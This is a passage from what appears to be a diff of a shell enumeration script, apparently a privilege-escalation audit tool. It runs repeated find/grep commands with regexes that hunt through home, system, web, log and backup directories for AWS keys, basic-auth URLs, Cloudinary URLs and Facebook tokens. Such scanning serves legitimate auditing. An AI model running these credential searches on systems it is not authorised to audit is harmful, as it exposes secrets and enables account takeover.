'/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +wait +print_3title "Searching AWS MWS Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}~${SED_RED}~" & +wait +print_3title "Searching AWS Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]~${SED_RED}~" & +wait +print_3title "Searching Basic Auth Credentials (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +wait +print_3title "Searching Cloudinary Basic Auth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +wait +print_3title "Searching Facebook Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +wait +print_3title "Searching Facebook Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +wait +print_3title "Searching Facebook Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +wait +print_3title "Searching Facebook Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /private -type f 